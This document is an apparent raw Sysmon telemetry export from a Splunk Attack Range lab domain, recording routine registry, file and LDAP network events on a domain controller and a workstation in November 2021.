12:19:13.099{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\35EEEAF2-B901-4CD5-89B2-F32D96B40997\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_35EEEAF2-B901-4CD5-89B2-F32D96B40997.XML 12241200x800000000000000057350748Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:13.099{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\35EEEAF2-B901-4CD5-89B2-F32D96B40997 11241100x800000000000000057350747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.083{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exeC:\System Volume Information\DFSR\Config\Replica_35EEEAF2-B901-4CD5-89B2-F32D96B40997.XML.TMP2021-11-12 12:19:13.083 12241200x800000000000000057350746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:13.083{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 23542300x800000000000000021219966Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:13.378{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB1234F4ABB68299E4B65246C56AD585,SHA256=E558E5FCB310F3B41CFE56AF6979132DF232F8866FA97DE81B843B351DEC23D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350803Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:14.814{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350802Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:14.814{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D359E5AAD1CD1E19184962D92A028CA2,SHA256=8B1406D2585AC0F6D1C321216A9527A2621AB8E081F52094287467C89ADFAD8Cfalsetrue 23542300x800000000000000021219968Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:14.691{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4C139069A3BBD4674D2EB19CED89274,SHA256=0867ACE4A31DBE4520BBEF9D70FBDE65767897DF15D8F63C2C1B8FDD11ADE895,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350801Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:14.583{8B6011A9-886D-6164-1200-00000000F101}460C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-10-11 18:54:38.077 23542300x800000000000000057350800Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:14.583{8B6011A9-886D-6164-1200-00000000F101}460NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=EECBA8FCD6A126DE2060BD5C3683F786,SHA256=A2FAB61E80309BA742831FBF0C0964FD867EBD61C1AAE13229746140B44755B2falsetrue 354300x800000000000000057350799Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:45.465{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54580-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local389ldap 354300x800000000000000057350798Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:45.465{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54580-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local389ldap 354300x800000000000000057350797Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:45.456{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54579-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local389ldap 354300x800000000000000057350796Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:45.456{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54579-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local389ldap 354300x800000000000000057350795Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:45.438{8B6011A9-886D-6164-0D00-00000000F101}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54578-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local135epmap 354300x800000000000000057350794Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:45.438{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54578-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local135epmap 12241200x800000000000000057350793Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:14.099{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 11241100x800000000000000057350792Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:14.084{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350791Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:14.084{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCD67E582A83D21D0F1EB409790D96D7,SHA256=ED506460973FE5B171D42FAC2AA24FED517F77E769C9179F00F690276B7C6E50falsetrue 23542300x800000000000000021219969Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:15.691{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=293324721700D42885799E6469C11E9D,SHA256=EB79A585164F743A24004FB2498833F2AF4C93D5922B0C80C42222CF55782321,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:15.834{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:15.833{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C2212251E1B6713034F7FCE5FA0533C,SHA256=0EEDAC825A91C405CE584C60C08920A6BAB013DAD98B3D6BA9BF79BAA3F1223Bfalsetrue 354300x800000000000000057350806Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:46.437{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54581-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057350805Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:15.114{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350804Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:15.114{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=61AED84F38506CAF2D2B4CE2F65A024D,SHA256=6C2C0B5FB9BD719AA71EA6506936B76B7C8685B76CC3295CAE72259250A42043falsetrue 11241100x800000000000000057350832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.834{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.834{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F84B0137D350789846F316D7D930D065,SHA256=32E884EFB3BFD69B6DBD5AA39978C1AD395677BD9561865F5969542664D56E95falsetrue 23542300x800000000000000021219970Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:16.691{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA0CBBF725170EDA8B3F96EBEDB4F83B,SHA256=E240BA618C9BFAE96A4C55F3B4B124D673B5E766188B6CFA428DD1B1235FE6F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350830Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.382{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350829Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.382{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=2AA8985B68EB1097CABC7D487B652013,SHA256=F8724B997C28BF0F0D778D7E3D24464ACA284121507ED8A883CCC0CBE37E47C2falsetrue 11241100x800000000000000057350828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.382{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350827Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.382{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=709AA3C655E19BB71C4EDF36344EC7BB,SHA256=5A85819BFD0BDB26160617945E156C9CC68CC3E2663215C8440A960124CFC096falsetrue 11241100x800000000000000057350826Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.382{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350825Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.382{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=705DBCA052BF0B2E9EFD977B98207AD1,SHA256=94CB33DF33DF05746BE364D167CD56BDF252C9E58FE50085D60D1793EAE18028falsetrue 11241100x800000000000000057350824Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.382{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350823Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.382{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=FD440C2237D03F6AE0D38A44918719AE,SHA256=4A7CF3FADA1FA00010C9A82F6D8FB027840B8397D1E577B9E52CA3525DABAC68falsetrue 11241100x800000000000000057350822Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=7BD978B2E9E3519DB568FF92B80E2024,SHA256=BEE7C0461BAE20BDACE4B68BEEAD1DCFEF12BDF6FE789C5A6FB932448903B8ADfalsetrue 11241100x800000000000000057350820Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=F403D839E172BD8C8FBBBBDB84A4E6EE,SHA256=05029F3168364190AB031B8B1024B956941949C84DB60EF390EE8BA9E3B20E86falsetrue 11241100x800000000000000057350818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=051EB693C4657136296AF327BCD945DE,SHA256=BEB99CC602736E327ACA50C0D0D0A084F6C1F56461FDEB8F2EE88639C0F593A4falsetrue 11241100x800000000000000057350816Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=D7EBF695137D37C89C13897046DF9946,SHA256=FC07D657394E2210A56BD30BBA723DAA11EDF893380790E4256F252FF5383FB5falsetrue 11241100x800000000000000057350814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=B99BD4EF7A198DF76E8F3E1CCD5FEAD9,SHA256=E011CC40CC3719424C2FC8764ADB39801AC6C3BE7C530F50B439636E71D34680falsetrue 11241100x800000000000000057350812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=51611198ECBB7CD1FFE0EA5F98C4F374,SHA256=C0A726728E2945E7F26E79B19D3C180D61B6DF5BF2BFFDB489F3270E2CA5FFBCfalsetrue 11241100x800000000000000057350810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057350809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:16.366{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=505C8ACECDF32B00397342BA4F1C8900,SHA256=9EF673D0F0B97F96C814AD13BAD89BA0918EB41ADC9017788A4F4A0DE26CC9B9falsetrue 11241100x800000000000000057350834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:17.850{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:17.850{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6123906DF1E3F40A9D247416589F0B75,SHA256=DD3D38D3251C285E16F10908F078CCF95461B9A4D3C310E2012F9FC9DDAF31E9falsetrue 23542300x800000000000000021219972Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:17.722{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB00644C554360D317F342252928BC36,SHA256=85CD1C5721E2E37F543C5E5FA2E4E42067B286F801BDBEEBDF553400A84B2E2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219971Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:17.284{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2A0C90F1072D4233BF6099042A25731,SHA256=261FAA2170253E271E67509EDB51E60ADC342A4ABAC2013074108224347FA743,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219974Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:18.753{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC24C86A7467EE3AC2EFD7903B066E9F,SHA256=001C0B6092E44F209C6D16BCFA0254344FDF1FEA51968BD750CD2A7408D253E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350838Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:18.865{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350837Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:18.865{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08F286F70E7772D5463A44EAC813A90B,SHA256=0706776F71BFB98F256FB2757EEBCB6F7162169A72A0E5A7B518B84288B01766falsetrue 12241200x800000000000000057350836Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:18.412{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057350835Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:18.412{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 354300x800000000000000021219973Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:20:04.676{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64348-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057350842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:19.881{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:19.881{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4C4ABF58F3EDFAC2201BF29C4908CFB,SHA256=1C3E097B11E2853280D98A50D1AE4E5DEFDD2565AAE5445BCCF76F190E2CB674falsetrue 23542300x800000000000000021219975Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:19.753{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ACBBB179284E479031928F4E3872C95,SHA256=B0E089AD68EA1C4E7B55B056F1EF01D8AC72217AE68F387EB1562D9BAA3C3D00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:19.433{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:19.432{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 